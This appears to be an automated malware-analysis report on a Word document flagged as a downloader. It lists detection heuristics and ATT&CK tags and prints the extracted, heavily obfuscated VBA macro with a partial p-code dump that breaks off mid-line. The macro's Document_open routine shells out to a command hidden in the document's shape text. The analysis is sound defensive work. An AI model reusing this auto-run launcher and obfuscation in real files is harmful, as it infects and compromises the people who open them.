MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with a Document_Open subroutine that executes a PowerShell command. This command decodes and executes a Base64 encoded string, which likely downloads and runs a second-stage payload. The presence of the PowerShell execution and the ClamAV detection strongly indicate a downloader malware.
Heuristics 7
-
ClamAV: Doc.Downloader.Sload-6741782-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sload-6741782-0
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() Dim wDTiIL(2) -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20069 bytes |
SHA-256: fec6c537dd373687d47977f4d0ba0424390033b9a21d1e9e9895550f68107a2a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
274 of 366 identifiers look randomly generated (e.g. 'vSicFOIiWaDcRBMlVMNwjaam') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ipWpkHFqHjOpPt" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() Dim wDTiIL(2) wDTiIL(0) = InStrRev(jljNwd + ijsBIVMkvJqdUDjjwZjL + oNfFL, OCQWzjq + vuNCOpMvJQtqJzXqHhSYFc + EUiXpHF) / InStrRev(wApzBjHB + YsQwJiWJcVHZmbPmam + KZpHVGz, fqDjnV + SnvATqaDtIrPzAnZTbBO + wcjjdU) - InStrRev(zHwofqiO + MoTGjqPhwFNRZUOrTHZD + rBzhPq, RBYzsw + GnIkkqFvWTWkkSoooPqR + qAYLl) - InStrRev(wzBluQ + ctltXmpOniDHQVDkt + tKtBX, BpCGmMV + iSEKKYZKuvkjoLbAbAV + OMzcw) wDTiIL(1) = InStrRev(iLzURofr + TrcopwVRblVdIDvzad + DNZRWOAf, XjdhMZZ + itGMiHJlktvDZbQUbHR + rGrka) * InStrRev(YbXzvz + rPFPuqizaHlIFXzNUbiWj + VTCrHc, cLCBBK + CKSEOEXmwrhtWUjV + wSfMicMz) * InStrRev(uLTfMQqA + fFJksKSjhUotrnrfq + aCwVvij, jTAPsJu + KtRibGFbUcwUFiHnWO + aDnUtwL) * InStrRev(YHjwIwaq + CLdfMHcKBGwJVHnlZGQlj + fZwij, YmZwYb + ozhmbwqRVnElatEzbD + UJdkjhu) Dim BpjJZc(3) BpjJZc(0) = InStr(iiDjT + jokusEHkLhPTHhisEEtz + piIDaD, Mfpsfmm + AzsMaAAMdbmsmXCZwhI + lGcsl) + InStrRev(GKztzY + jHCNZuUszYHjMvpjbTSIOB + cstquN, qiuiRtlk + DhtOcBsivQwMZPcz + uvWEszH) / InStrRev(iiQBwfa + rjCisZqiVrdJlklXKjD + zNiinNh, MHbbP + MCPlXEYwRqtDCjoffqJDU + awiIIsia) - InStrRev(nRGuolD + nvAjSwkYGCzfdcSXIzL + zALSk, GhzBw + LKGHJThsVbQLSjbTvhSm + hBwRz) BpjJZc(1) = InStr(DMHMCpC + RHqrTmaUXZdiXWHcSzPv + NzKTKjZK, KwshCP + aWFYiOpjaqICMRzbHKnATr + bdZZDdS) - InStrRev(mpVwi + zTiNwtcXnOnmjLjODJA + krOMPKf, mBzMEkw + BPPiijzIPParwdGQjM + lGAVn) BpjJZc(2) = InStrRev(wRSMz + FIhNGANGuCSMfEkoHdY + MoCTz, zJkYzjT + sYzFSIfSmObmjaVAS + PzODJbCf) - InStrRev(fcPEZct + WALsEousXOSnNvJOLjdmqdw + hGwbJ, wDHJPOd + hSrPTalffzsNUGtQlY + BlzFs) Dim TlwlFf(3) TlwlFf(0) = InStrRev(wHFYl + GiGiUMwLCmhWAPmZib + XtvdOF, rjKUFZ + YXNljTzSCzplMoFipY + SNnuBLf) - InStrRev(utAKOhp + ddMHHdiijzrfUvXwZwGUM + sLnmGQit, VKGJP + zpsPYUSKsfIztMlS + ZjMlYk) * InStrRev(RnJdFUW + TASTvXzYwWRtYzYGjdzaAh + WVRoc, SRbEdLN + nwTXPEbuQpZSmCSd + ItsMF) / InStr(YwvSmznB + qKQptMizsJSbtsiEaLJ + DwUWQ, QYhbTHR + JhGmnGViTGIwhdImv + OfFstt) TlwlFf(1) = InStr(LbPXRd + VwdRnzMdlWupzfwTahuNbl + ftZVh, npRaaRT + HXWaLwiUKbMajCojjuQp + MpCOW) - InStrRev(EVFDO + jwqBXCWMPtFcmrhGUzGs + IUIEiwRd, kDOSNjzj + RZULrNIXwcGWiOIbRb + oHacPtk) TlwlFf(2) = InStrRev(Fwhjzw + bJFvViMDfVqHVofDRlGOn + AYVfi, LpRVoTdt + OPJPkruTsvvSwQdJ + wCvvfb) + InStrRev(MaXUvAYm + SdkPazUWDpDzkRMOUEdY + RYKZu, bNqMo + vPKEQJJnuIiLYUFpHIbVvc + bmtNwkj) + InStrRev(uYIlw + QQLinGBHwZUTcHfhpt + wcFPR, EJSrFiRZ + ksGzLPLfwAFQBrNGirk + uPBco) - InStrRev(ipNEA + mMGEmwzsRzVSHdzH + wNWWu, PDwqJu + cmwSNvWkTLHPijFGqzjirh + pVJLdcZ) Dim iizZl(1) iizZl(0) = InStr(wiNuEGJ + scVWHSzPuXqsqVENTKJw + lYpSjjrP, UbRALkz + zlGorcqCzHjjVZVuiLjamEB + DBjKzFAL) + InStrRev(wqqjvQw + FsiQfSbfKTkqltPwkbUOqK + silKnBNk, kEsXZh + zIFwiACSMlGZbjBhAf + ApZJLEM) Dim ISSEz(1) ISSEz(0) = InStrRev(VjfNtt + AzDTclNaMcwNbIbfVQSV + lGTiS, nviiqj + vsAsUAAtIvSNUYhNrfts + MLRtaji) - InStr(ZYRdbEkM + XJCSXAEVrIBAAHiAAbMZVv + AjJGSB, bKsusWz + kYYQVOCMrwKXXkDCMl + iYfzw) Const ZcHskhKhCZw = 68556202 - 68556202 Shell@ Shapes(1).TextFrame.TextRange.Text + iKwmvv + liBza, ZcHskhKhCZw Dim mMHYj(1) mMHYj(0) = InStr(AITHuVbL + mfqXAsiKlwLEjEpPP + wqinVm, WKOkikI + EOtZqsiICKQlwYiApNmF + OmDrdUb) + InStrRev(LARuG + GNkNMlOqQCIMYRIcGipiijN + XjXcCpG, tVcYNH + SrftriirVRizDdSzsa + RsmtWz) Dim fRoXzA(2) fRoXzA(0) = InStr(fEGIrp + JwQKvpoGzquAPofjn + nNwtTho, TnbrAKai + ARCJlQDrUMJKLCLCHHz + WGZjA) - InStrRev(wbLXNl + dPizSKdsMpHOUBwzmfqT + GPhzLSa, ZsdCAYMd + KzzQfqOnQhmvMRcdj + IPHEqw) / InStrRev(aCJwsp + CIpDmiSmCsnHjzAckJazXQPq + wiUFRaU, cawUHoGK + CITzBWqbRmXrnUXhpJiJl + noTLQG) / InStrRev(cTfkS + wMZEFiJJTicczhfmjB + AjZrKqSj, NKSkhMfd + ridVSUzFfzOYXjrzTq + dOWEOAS) fRoXzA(1) = InStrRev(XwFSC + FWViYwUEMKjoiIEAGvA + mYuDrJFU, uzVFEf + ACpmSNfwOCwcXrzEjc + pDWkM) - InStrRev(zUftA + AGSqMqRfppNEasaGvA + rAhuPhRj, QrtmtQ + XYjufAuunTuGHRpiSbjNG + hVLowJ) Dim hRQQV(3) hRQQV(0) = InStr(jETwKUpq + WZuvHUMUNBEkhijRlNd + mvZcvCc, izZnWa + DBopbUTAQFYiAIIMvQR + zlFhFWh) * InStrRev(NKcLzK + IumWcldAfNNCjDppOEO + wEUqQNL, IHWfPXA + EqUvSGYIHVMhuPDQnqmUP + APDnSomi) - InStrRev(OAmORXFD + aNGbpzokSWFTYoUpja + bpYlCWS, mDTnIb + FwurRIOIIjkOwcimRNj + kFTQFS) + InStrRev(XVacJ + jrXuOwCpFwLdFYjcGLp + qHWNs, NiUGZp + inDdLGXXqQjmwqaOEG + KTjjcIj) hRQQV(1) = InStrRev(lcuSIM + jjwWcZjvWPwzVEsJcZ + ojAQTm, iVOUWOMi + CjmTHDfZNPCdbKnbCGu + ldNNaGs) + InStrRev(TXzcU + NoNGZsmPBEZGIFEii + ESVFtJEH, LQpRjVHJ + wYCTEKQsXlzkXkUiiiHIN + JlbjwZtB) - InStrRev(QCAjtpP + OjRhlnbCrqQoBinIaM + jDihTzo, nIwJrEpw + qJAPbwmiBGusKzHCUcOww + GEJawJR) / InStrRev(ZfnClj + slsPoMahvpVCnuph + DwdiwXGp, nLpFMk + sCzQOclOcAIvzspPlrozld + KmFqC) hRQQV(2) = InStr(pVpmiA + JiowWSFQXUfaDnkaiwI + iXJWtCGO, iVwjHNr + TizwlSbwZDNAsqSzLOQFjuYh + cNqQU) * InStrRev(jaXDSD + vSicFOIiWaDcRBMlVMNwjaam + ttKIQ, uEMsUiv + OnOYLSILciWzBicCcQuLjZ + zzBhSBm) + InStr(XzvalwWo + wChQktSdUbtmKMkuPU + rEkfbrSX, TVdQiRi + JrLoAColmtnllMAXRaK + GfYIu) * InStrRev(QqkBwf + cmQjldpjQZXQGHvHiUijjH + wBkOLvQ, KdKbQwo + GCKjbCXhPzGTztjwC + ALcwUkj) Dim cJOzVj(4) cJOzVj(0) = InStrRev(niPJGI + LElOnoKIMTUiFoafHwdT + HwjqcM, dcuYKsoz + JNkmhpGndSlhknAbkfzvYEd + LiqIIoK) / InStrRev(UOtkpju + uJkJLwXEJRLhEcwnJdt + WLdiA, BvMilA + ulDiATnJzPMiOBjimz + EUpQQUWK) - InStr(bsYZPZj + TlkdluzhBROWbJKCBSnnu + OuplK, bzDTrEW + oICLERZGOjDFfqffhIwrS + bsjSGjNv) - InStrRev(raBwSPf + iWTFcAqGPsRkpjtnH + JjSzQdiP, vzCYHn + hqHjGMvsHjVToMnmdkw + WbWlbkhw) cJOzVj(1) = InStrRev(aIhdZF + kbfWZHOMUAahlKiqVUH + jVNLGiNj, LjKzCP + YNwPopRTvPXAsqDtT + GTpSaDG) / InStrRev(bOGiMrQ + lpPSRNhiSIzWuGdaV + LIToIu, BaWUiROo + DsYoCcFzoGOpLJGzdFUmp + cBEpjSb) * InStr(WwXFqj + GinkLKTmpYVjGVADYKI + qsnQHBI, ZjHcwR + CYcDdjPzkqfIkAuSXCiGj + JZauYjNn) * InStrRev(LjMJXBI + ORpiObwTiXRhZqoEM + UcOhRh, BWqOQfTr + VktFjSKfkhMEvwNTj + pThBbh) cJOzVj(2) = InStrRev(Fwclq + PswSGCSoSmEUXfIBu + iqhBdi, SNnWhUX + SRBsjdoTzazcprKFlFZuj + ZRzBlzRF) + InStrRev(ZfzBENJ + mpXKYKScwtWSnMqSNaf + wYMKE, PPaRJBGY + hpHpGHrlrWqRhQMAdzO + dHrWZ) cJOzVj(3) = InStr(RHmtp + rRUvTpZzsKrlhbTuAM + VqWlEi, RCwUiIEv + DKwLidMZKZvPFtBwEQqS + omZpYWYo) + InStrRev(oRJHt + JUOVmbhJzwBVNStqmDBnB + zEkpzDfE, pXBtwIPX + uvwWrNCIIjNOnvTCuWRfuF + zovlQbVF) * InStr(NwjBs + QbJOzbwUfPcQvVEz + PmthtP, StdVGd + dANkpwwcmFwDvjCBpQhE + bBmmHJY) - InStrRev(sEkch + nEGJmRFwmDcoWvvNuKTV + KuVsKGV, cdzCoKwp + FvzmwISUZfUjcWjDYfiv + SwwVCzUP) End Sub ' Processing file: /tmp/qstore_ilmjg00g ' =============================================================================== ' Module streams: ' Macros/VBA/ipWpkHFqHjOpPt - 10664 bytes ' Line #0: ' FuncDefn (Private Sub Document_open()) ' Line #1: ' Dim ' OptionBase ' LitDI2 0x0002 ' VarDefn wDTiIL ' Line #2: ' Ld jljNwd ' Ld ijsBIVMkvJqdUDjjwZjL ' Add ' Ld oNfFL ' Add ' Ld OCQWzjq ' Ld vuNCOpMvJQtqJzXqHhSYFc ' Add ' Ld EUiXpHF ' Add ' ArgsLd InStrRev 0x0002 ' Ld wApzBjHB ' Ld YsQwJiWJcVHZmbPmam ' Add ' Ld KZpHVGz ' Add ' Ld fqDjnV ' Ld SnvATqaDtIrPzAnZTbBO ' Add ' Ld wcjjdU ' Add ' ArgsLd InStrRev 0x0002 ' Div ' Ld zHwofqiO ' Ld MoTGjqPhwFNRZUOrTHZD ' Add ' Ld rBzhPq ' Add ' Ld RBYzsw ' Ld GnIkkqFvWTWkkSoooPqR ' Add ' Ld qAYLl ' Add ' ArgsLd InStrRev 0x0002 ' Sub ' Ld wzBluQ ' Ld ctltXmpOniDHQVDkt ' Add ' Ld tKtBX ' Add ' Ld BpCGmMV ' Ld iSEKKYZKuvkjoLbAbAV ' Add ' Ld OMzcw ' Add ' ArgsLd InStrRev 0x0002 ' Sub ' LitDI2 0x0000 ' ArgsSt wDTiIL 0x0001 ' Line #3: ' Ld iLzURofr ' Ld TrcopwVRblVdIDvzad ' Add ' Ld DNZRWOAf ' Add ' Ld XjdhMZZ ' Ld itGMiHJlktvDZbQUbHR ' Add ' Ld rGrka ' Add ' ArgsLd InStrRev 0x0002 ' Ld YbXzvz ' Ld rPFPuqizaHlIFXzNUbiWj ' Add ' Ld VTCrHc ' Add ' Ld cLCBBK ' Ld CKSEOEXmwrhtWUjV ' Add ' Ld wSfMicMz ' Add ' ArgsLd InStrRev 0x0002 ' Mul ' Ld uLTfMQqA ' Ld fFJksKSjhUotrnrfq ' Add ' Ld aCwVvij ' Add ' Ld jTAPsJu ' Ld KtRibGFbUcwUFiHnWO ' Add ' Ld aDnUtwL ' Add ' ArgsLd InStrRev 0x0002 ' Mul ' Ld YHjwIwaq ' Ld CLdfMHcKBGwJVHnlZGQlj ' Add ' Ld fZwij ' Add ' Ld YmZwYb ' Ld ozhmbwqRVnElatEzbD ' Add ' Ld UJdkjhu ' Add ' ArgsLd InStrRev 0x0002 ' Mul ' LitDI2 0x0001 ' ArgsSt wDTiIL 0x0001 ' Line #4: ' Dim ' OptionBase ' LitDI2 0x0003 ' VarDefn BpjJZc ' Line #5: ' Ld iiDjT ' Ld jokusEHkLhPTHhisEEtz ' Add ' Ld piIDaD ' Add ' Ld Mfpsfmm ' Ld AzsMaAAMdbmsmXCZwhI ' Add ' Ld lGcsl ' Add ' FnInStr ' Ld GKztzY ' Ld jHCNZuUszYHjMvpjbTSIOB ' Add ' Ld cstquN ' Add ' Ld qiuiRtlk ' Ld DhtOcBsivQwMZPcz ' Add ' Ld uvWEszH ' Add ' ArgsLd InStrRev 0x0002 ' Ld iiQBwfa ' Ld rjCisZqiVrdJlklXKjD ' Add ' Ld zNiinNh ' Add ' Ld MHbbP ' Ld MCPlXEYwRqtDCjoffqJDU ' Add ' Ld awiIIsia ' Add ' ArgsLd InStrRev 0x0002 ' Div ' Add ' Ld nRGuolD ' Ld nvAjSwkYGCzfdcSXIzL ' Add ' Ld zALSk ' Add ' Ld GhzBw ' Ld LKGHJThsVbQLSjbTvhSm ' Add ' Ld hBwRz ' Add ' ArgsLd InStrRev 0x0002 ' Sub ' LitDI2 0x0000 ' ArgsSt BpjJZc 0x0001 ' Line #6: ' Ld DMHMCpC ' Ld RHqrTmaUXZdiXWHcSzPv ' Add ' Ld NzKTKjZK ' Add ' Ld KwshCP ' Ld aWFYiOpjaqICMRzbHKnATr ' Add ' Ld bdZZDdS ' Add ' FnInStr ' Ld mpVwi ' Ld zTiNwtcXnOnmjLjODJA ' Add ' Ld krOMPKf ' Add ' Ld mBzMEkw ' Ld BPPiijzIPParwdGQjM ' Add ' Ld lGAVn ' Add ' ArgsLd InStrRev 0x0002 ' Sub ' LitDI2 0x0001 ' ArgsSt BpjJZc 0x0001 ' Line #7: ' Ld wRSMz ' Ld FIhNGANGuCSMfEkoHdY ' Add ' Ld MoCTz ' Add ' Ld zJkYzjT ' Ld sYzFSIfSmObmjaVAS ' Add ' Ld PzODJbCf ' Add ' ArgsLd InStrRev 0x0002 ' Ld fcPEZct ' Ld WALsEousXOSnNvJOLjdmqdw ' Add ' Ld hGwbJ ' Add ' Ld wDHJPOd ' Ld hSrPTalffzsNUGtQlY ' Add ' Ld BlzFs ' Add ' ArgsLd InStrRev 0x0002 ' Sub ' LitDI2 0x0002 ' ArgsSt BpjJZc 0x0001 ' Line #8: ' Dim ' OptionBase ' LitDI2 0x0003 ' VarDefn TlwlFf ' Line #9: ' Ld wHFYl ' Ld GiGiUMwLCmhWAPmZib ' Add ' Ld XtvdOF ' Add ' Ld rjKUFZ ' Ld YXNljTzSCzplMoFipY ' Add ' Ld SNnuBLf ' Add ' ArgsLd InStrRev 0x0002 ' Ld utAKOhp ' Ld ddMHHdiijzrfUvXwZwGUM ' Add ' Ld sLnmGQit ' Add ' Ld VKGJP ' Ld zpsPYUSKsfIztMlS ' Add ' Ld ZjMlYk ' Add ' ArgsLd InStrRev 0x0002 ' Ld RnJdFUW ' Ld TASTvXzYwWRtYzYGjdzaAh ' Add ' Ld WVRoc ' Add ' Ld SRbEdLN ' Ld nwTXPEbuQpZSmCSd ' Add ' Ld ItsMF ' Add ' ArgsLd InStrRev 0x0002 ' Mul ' Ld YwvSmznB ' Ld qKQptMizsJSbtsiEaLJ ' Add ' Ld DwUWQ ' Add ' Ld QYhbTHR ' Ld JhGmnGViTGIwhdImv ' Add ' Ld OfFstt ' Add ' FnInStr ' Div ' Sub ' LitDI2 0x0000 ' ArgsSt TlwlFf 0x0001 ' Line #10: ' Ld LbPXRd ' Ld VwdRnzMdlWupzfwTahuNbl ' Add ' Ld ftZVh ' Add ' Ld npRaaRT ' Ld HXWaLwiUKbMajCojjuQp ' Add ' Ld MpCOW ' Add ' FnInStr ' Ld EVFDO ' Ld jwqBXCWMPtFcmrhGUzGs ' Add ' Ld IUIEiwRd ' Add ' Ld kDOSNjzj ' Ld RZULrNIXwcGWiOIbRb ' Add ' Ld oHacPtk ' Add ' ArgsLd InStrRev 0x0002 ' Sub ' LitDI2 0x0001 ' ArgsSt TlwlFf 0x0001 ' Line #11: ' Ld Fwhjzw ' Ld bJFvViMDfVqHVofDRlGOn ' Add ' Ld AYVfi ' Add ' Ld LpRVoTdt ' Ld OPJPkruTsvvSwQdJ ' Add ' Ld wCvvfb ' Add ' ArgsLd InStrRev 0x0002 ' Ld MaXUvAYm ' Ld SdkPazUWDpDzkRMOUEdY ' Add ' Ld RYKZu ' Add ' Ld bNqMo ' Ld vPKEQJJnuIiLYUFpHIbVvc ' Add ' Ld bmtNwkj ' Add ' ArgsLd InStrRev 0x0002 ' Add ' Ld uYIlw ' Ld QQLinGBHwZUTcHfhpt ' Add ' Ld wcFPR ' Add ' Ld EJSrFiRZ ' Ld ksGzLPLfwAFQBrNGirk ' Add ' Ld uPBco ' Add ' ArgsLd InStrRev 0x0002 ' Add ' Ld ipNEA ' Ld mMGEmwzsRzVSHdzH ' Add ' Ld wNWWu ' Add ' Ld PDwqJu ' Ld cmwSNvWkTLHPijFGqzjirh ' Add ' Ld pVJLdcZ ' Add ' ArgsLd InStrRev 0x0002 ' Sub ' LitDI2 0x0002 ' ArgsSt TlwlFf 0x0001 ' Line #12: ' Dim ' OptionBase ' LitDI2 0x0001 ' VarDefn iizZl ' Line #13: ' Ld wiNuEGJ ' Ld scVWHSzPuXqsqVENTKJw ' Add ' Ld lYpSjjrP ' Add ' Ld UbRALkz ' Ld zlGorcqCzHjjVZVuiLjamEB ' Add ' Ld DBjKzFAL ' Add ' FnInStr ' Ld wqqjvQw ' Ld FsiQfSbfKTkqltPwkbUOqK ' Add ' Ld silKnBNk ' Add ' Ld kEsXZh ' Ld zIFwiACSMlGZbjBhAf ' Add ' Ld ApZJLEM ' Add ' ArgsLd InStrRev 0x0002 ' Add ' LitDI2 0x0000 ' ArgsSt iizZl 0x0001 ' Line #14: ' Dim ' OptionBase ' LitDI2 0x0001 ' VarDefn ApZJLEM ' Line #15: ' Ld ISSEz ' Ld VjfNtt ' Add ' Ld AzDTclNaMcwNbIbfVQSV ' Add ' Ld lGTiS ' Ld nviiqj ' Add ' Ld vsAsUAAtIvSNUYhNrfts ' Add ' ArgsLd InStrRev 0x0002 ' Ld MLRtaji ' Ld ZYRdbEkM ' Add ' Ld XJCSXAEVrIBAAHiAAbMZVv ' Add ' Ld AjJGSB ' Ld bKsusWz ' Add ' Ld kYYQVOCMrwKXXkDCMl ' Add ' FnInStr ' Sub ' LitDI2 0x0000 ' ArgsSt ApZJLEM 0x0001 ' Line #16: ' Dim (Const) ' LitDI4 0x15AA 0x0416 ' LitDI4 0x15AA 0x0416 ' Sub ' VarDefn iYfzw ' Line #17: ' LitDI2 0x0001 ' ArgsLd Shell 0x0001 ' MemLd Shapes ' MemLd TextFrame ' MemLd Text ' Ld TextRange ' Add ' Ld iKwmvv ' Add ' Ld iYfzw ' ArgsCall ZcHskhKhCZw@ 0x0002 ' Line #18: ' Dim ' OptionBase ' LitDI2 0x0001 ' VarDefn liBza ' Line #19: ' Ld mMHYj ' Ld AITHuVbL ' Add ' Ld mfqXAsiKlwLEjEpPP ' Add ' Ld wqinVm ' Ld WKOkikI ' Add ' Ld EOtZqsiICKQlwYiApNmF ' Add ' FnInStr ' Ld OmDrdUb ' Ld LARuG ' Add ' Ld GNkNMlOqQCIMYRIcGipiijN ' Add ' Ld XjXcCpG ' Ld tVcYNH ' Add ' Ld SrftriirVRizDdSzsa ' Add ' ArgsLd InStrRev 0x0002 ' Add ' LitDI2 0x0000 ' ArgsSt liBza 0x0001 ' Line #20: ' Dim ' OptionBase ' LitDI2 0x0002 ' VarDefn RsmtWz ' Line #21: ' Ld fRoXzA ' Ld fEGIrp ' Add ' Ld JwQKvpoGzquAPofjn ' Add ' Ld nNwtTho ' Ld TnbrAKai ' Add ' Ld ARCJlQDrUMJKLCLCHHz ' Add ' FnInStr ' Ld WGZjA ' Ld wbLXNl ' Add ' Ld dPizSKdsMpHOUBwzmfqT ' Add ' Ld GPhzLSa ' Ld ZsdCAYMd ' Add ' Ld KzzQfqOnQhmvMRcdj ' Add ' ArgsLd InStrRev 0x0002 ' Ld IPHEqw ' Ld aCJwsp ' Add ' Ld CIpDmiSmCsnHjzAckJazXQPq ' Add ' Ld wiUFRaU ' Ld cawUHoGK ' Add ' Ld CITzBWqbRmXrnUXhpJiJl ' Add ' ArgsLd InStrRev 0x0002 ' Div ' Ld noTLQG ' Ld cTfkS ' Add ' Ld wMZEFiJJTicczhfmjB ' Add ' Ld AjZrKqSj ' Ld NKSkhMfd ' Add ' Ld ridVSUzFfzOYXjrzTq ' Add ' ArgsLd InStrRev 0x0002 ' Div ' Sub ' LitDI2 0x0000 ' ArgsSt RsmtWz 0x0001 ' Line #22: ' Ld dOWEOAS ' Ld XwFSC ' Add ' Ld FWViYwUEMKjoiIEAGvA ' Add ' Ld mYuDrJFU ' Ld uzVFEf ' Add ' Ld ACpmSNfwOCwcXrzEjc ' Add ' ArgsLd InStrRev 0x0002 ' Ld pDWkM ' Ld zUftA ' Add ' Ld AGSqMqRfppNEasaGvA ' Add ' Ld rAhuPhRj ' Ld QrtmtQ ' Add ' Ld XYjufAuunTuGHRpiSbjNG ' Add ' ArgsLd InStrRev 0x0002 ' Sub ' LitDI2 0x0001 ' ArgsSt RsmtWz 0x0001 ' Line #23: ' Dim ' OptionBase ' LitDI2 0x0003 ' VarDefn hVLowJ ' Line #24: ' Ld hRQQV ' Ld jETwKUpq ' Add ' Ld WZuvHUMUNBEkhijRlNd ' Add ' Ld mvZcvCc ' Ld izZnWa ' Add ' Ld DBopbUTAQFYiAIIMvQR ' Add ' FnInStr ' Ld zlFhFWh ' Ld NKcLzK ' Add ' Ld IumWcldAfNNCjDppOEO ' Add ' Ld wEUqQNL ' Ld IHWfPXA ' Add ' Ld EqUvSGYIHVMhuPDQnqmUP ' Add ' ArgsLd InStrRev 0x0002 ' Mul ' Ld APDnSomi ' Ld OAmORXFD ' Add ' Ld aNGbpzokSWFTYoUpja ' Add ' Ld bpYlCWS ' Ld mDTnIb ' Add ' Ld FwurRIOIIjkOwcimRNj ' Add ' ArgsLd InStrRev 0x0002 ' Sub ' Ld kFTQFS ' Ld XVacJ ' Add ' Ld jrXuOwCpFwLdFYjcGLp ' Add ' Ld qHWNs ' Ld NiUGZp ' Add ' Ld inDdLGXXqQjmwqaOEG ' Add ' ArgsLd InStrRev 0x0002 ' Add ' LitDI2 0x0000 ' ArgsSt hVLowJ 0x0001 ' Line #25: ' Ld KTjjcIj ' Ld lcuSIM ' Add ' Ld jjwWcZjvWPwzVEsJcZ ' Add ' Ld ojAQTm ' Ld iVOUWOMi ' Add ' Ld CjmTHDfZNPCdbKnbCGu ' Add ' ArgsLd InStrRev 0x0002 ' Ld ldNNaGs ' Ld TXzcU ' Add ' Ld NoNGZsmPBEZGIFEii ' Add ' Ld ESVFtJEH ' Ld LQpRjVHJ ' Add ' Ld wYCTEKQsXlzkXkUiiiHIN ' Add ' ArgsLd InStrRev 0x0002 ' Add ' Ld JlbjwZtB ' Ld QCAjtpP ' Add ' Ld OjRhlnbCrqQoBinIaM ' Add ' Ld jDihTzo ' Ld nIwJrEpw ' Add ' Ld qJAPbwmiBGusKzHCUcOww ' Add ' ArgsLd InStrRev 0x0002 ' Ld GEJawJR ' Ld ZfnClj ' Add ' Ld slsPoMahvpVCnuph ' Add ' Ld DwdiwXGp ' Ld nLpFMk ' Add ' Ld sCzQOclOcAIvzspPlrozld ' Add ' ArgsLd InStrRev 0x0002 ' Div ' Sub ' LitDI2 0x0001 ' ArgsSt hVLowJ 0x0001 ' Line #26: ' Ld KmFqC ' Ld pVpmiA ' Add ' Ld JiowWSFQXUfaDnkaiwI ' Add ' Ld iXJWtCGO ' Ld iVwjHNr ' Add ' Ld TizwlSbwZDNAsqSzLOQFjuYh ' Add ' FnInStr ' Ld cNqQU ' Ld jaXDSD ' Add ' Ld vSicFOIiWaDcRBMlVMNwjaam ' Add ' Ld ttKIQ ' Ld uEMsUiv ' Add ' Ld OnOYLSILciWzBicCcQuLjZ ' Add ' ArgsLd InStrRev 0x0002 ' Mul ' Ld zzBhSBm ' Ld XzvalwWo ' Add ' Ld wChQktSdUbtmKMkuPU ' Add ' Ld rEkfbrSX ' Ld TVdQiRi ' Add ' Ld JrLoAColmtnllMAXRaK ' Add ' FnInStr ' Ld GfYIu ' Ld QqkBwf ' Add ' Ld cmQjldpjQZXQGHvHiUijjH ' Add ' Ld wBkOLvQ ' Ld KdKbQwo ' Add ' Ld GCKjbCXhPzGTztjwC ' Add ' ArgsLd InStrRev 0x0002 ' Mul ' Add ' LitDI2 0x0002 ' ArgsSt hVLowJ 0x0001 ' Line #27: ' Dim ' OptionBase ' LitDI2 0x0004 ' VarDefn ALcwUkj ' Line #28: ' Ld cJOzVj ' Ld niPJGI ' Add ' Ld LElOnoKIMTUiFoafHwdT ' Add ' Ld HwjqcM ' Ld dcuYKsoz ' Add ' Ld JNkmhpGndSlhknAbkfzvYEd ' Add ' ArgsLd InStrRev 0x0002 ' Ld LiqIIoK ' Ld UOtkpju ' Add ' Ld uJkJLwXEJRLhEcwnJdt ' Add ' Ld WLdiA ' Ld BvMilA ' Add ' Ld ulDiATnJzPMiOBjimz ' Add ' ArgsLd InStrRev 0x0002 ' Div ' Ld EUpQQUWK ' Ld bsYZPZj ' Add ' Ld TlkdluzhBROWbJKCBSnnu ' Add ' Ld OuplK ' Ld bzDTrEW ' Add ' Ld oICLERZGOjDFfqffhIwrS ' Add ' FnInStr ' Sub ' Ld bsjSGjNv ' Ld raBwSPf ' Add ' Ld iWTFcAqGPsRkpjtnH ' Add ' Ld JjSzQdiP ' Ld vzCYHn ' Add ' Ld hqHjGMvsHjVToMnmdkw ' Add ' ArgsLd InStrRev 0x0002 ' Sub ' LitDI2 0x0000 ' ArgsSt ALcwUkj 0x0001 ' Line #29: ' Ld WbWlbkhw ' Ld aIhdZF ' Add ' Ld kbfWZHOMUAahlKiqVUH ' Add ' Ld jVNLGiNj ' Ld LjKzCP ' Add ' Ld YNwPopRTvPXAsqDtT ' Add ' ArgsLd InStrRev 0x0002 ' Ld GTpSaDG ' Ld bOGiMrQ ' Add ' Ld lpPSRNhiSIzWuGdaV ' Add ' Ld LIToIu ' Ld BaWUiROo ' Add ' Ld DsYoCcFzoGOpLJGzdFUmp ' Add ' ArgsLd InStrRev 0x0002 ' Div ' Ld cBEpjSb ' Ld WwXFqj ' Add ' Ld GinkLKTmpYVjGVADYKI ' Add ' Ld qsnQHBI ' Ld ZjHcwR ' Add ' Ld CYcDdjPzkqfIkAuSXCiGj ' Add ' FnInStr ' Mul ' Ld JZauYjNn ' Ld LjMJXBI ' Add ' Ld ORpiObwTiXRhZqoEM ' Add ' Ld UcOhRh ' Ld 